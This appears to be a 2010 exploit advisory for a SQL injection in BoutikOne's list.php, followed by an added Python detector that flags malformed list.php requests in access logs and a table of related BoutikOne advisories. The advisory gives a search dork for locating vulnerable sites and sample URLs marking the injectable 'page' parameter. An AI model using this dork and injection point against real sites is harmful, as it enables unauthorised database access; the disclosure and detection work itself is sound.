#####################################################################
# Exploit Title: BoutikOne® v1 (list.php) SQL Injection Vulnerability
# Date: 19/09/2010
# Author: BrOx-Dz
# Author: E.dz@hotmail.fr
# Software Link: http://www.boutikone.com/
# Dork : Powered by BoutikOne®
# Version: BoutikOne®
# Tested on: windows xp pack 3
#####################################################################
----------------------------------------------------------------------------
#e.g : http://server/patch/list.php?lang=1&path=50&num=38&action=n&sort=Id&page=0[sql]
#demo : http://www.site.com/list.php?lang=1&path=42&num=13&action=n&sort=Id&page=0'
----------------------------------------------------------------------------
greatez: lagripe-dz mca_crb amine halim all dz members.
www.sec4ever.com / www.v4-team.com/cc/ / www.h4ckforu.com/vb/.
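A log-triage check for the request shown in the advisory, as an added example that is not part of the original advisory or of BoutikOne's code: it flags access-log requests to list.php whose parameters break the shapes seen in the sample URLs. The expected shapes, the function name `suspicious_params` and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed shapes, inferred only from the sample URLs in the advisory:
# lang, path, num and page are decimal integers; action is one letter;
# sort is a column-like identifier.
EXPECTED = {
    "lang": re.compile(r"[0-9]{1,9}"),
    "path": re.compile(r"[0-9]{1,9}"),
    "num": re.compile(r"[0-9]{1,9}"),
    "page": re.compile(r"[0-9]{1,9}"),
    "action": re.compile(r"[A-Za-z]"),
    "sort": re.compile(r"[A-Za-z_]{1,32}"),
}

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(log_line, script="list.php"):
    """Return sorted names of list.php parameters whose value breaks the expected shape."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/" + script):
        return []
    bad = set()
    # parse_qsl percent-decodes values, so an encoded quote (%27) is caught too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        pattern = EXPECTED.get(name)
        if pattern is not None and not pattern.fullmatch(value):
            bad.add(name)
    return sorted(bad)


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Sep/2010:10:00:00 +0000] "GET /list.php?lang=1&path=42&num=13&action=n&sort=Id&page=0 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [19/Sep/2010:10:00:05 +0000] "GET /list.php?lang=1&path=42&num=13&action=n&sort=Id&page=0%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [19/Sep/2010:10:00:09 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hits = suspicious_params(line)
        if hits:
            print("non-conforming", hits, "->", line.split('"')[1])
```

The same allow-list shapes can be enforced server-side before the values reach any query, which rejects the request instead of only reporting it.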
Related Exploits
Trying to match CVEs (1): CVE-2010-3479

Trying to match OSVDBs (1): 68193
Other Possible E-DB Search Terms: BoutikOne 1.0, BoutikOne
Date | Title | Author |
---|---|---|
2011-03-05 | BoutikOne - 'description.php' SQL Injection | IRAQ_JAGUAR |
2008-11-17 | BoutikOne CMS - 'search_query' Cross-Site Scripting | d3v1l |
2011-03-14 | BoutikOne - 'categorie.php?path' SQL Injection | cdx.security |
2011-03-14 | BoutikOne - 'list.php?path' SQL Injection | cdx.security |
2011-03-14 | BoutikOne - 'rss_flash.php?lang' SQL Injection | cdx.security |
2011-03-14 | BoutikOne - 'rss_news.php?lang' SQL Injection | cdx.security |
2011-03-14 | BoutikOne - 'rss_promo.php?lang' SQL Injection | cdx.security |
2011-03-14 | BoutikOne - 'rss_top10.php?lang' SQL Injection | cdx.security |
2011-03-14 | BoutikOne - 'search.php' Multiple SQL Injections | cdx.security |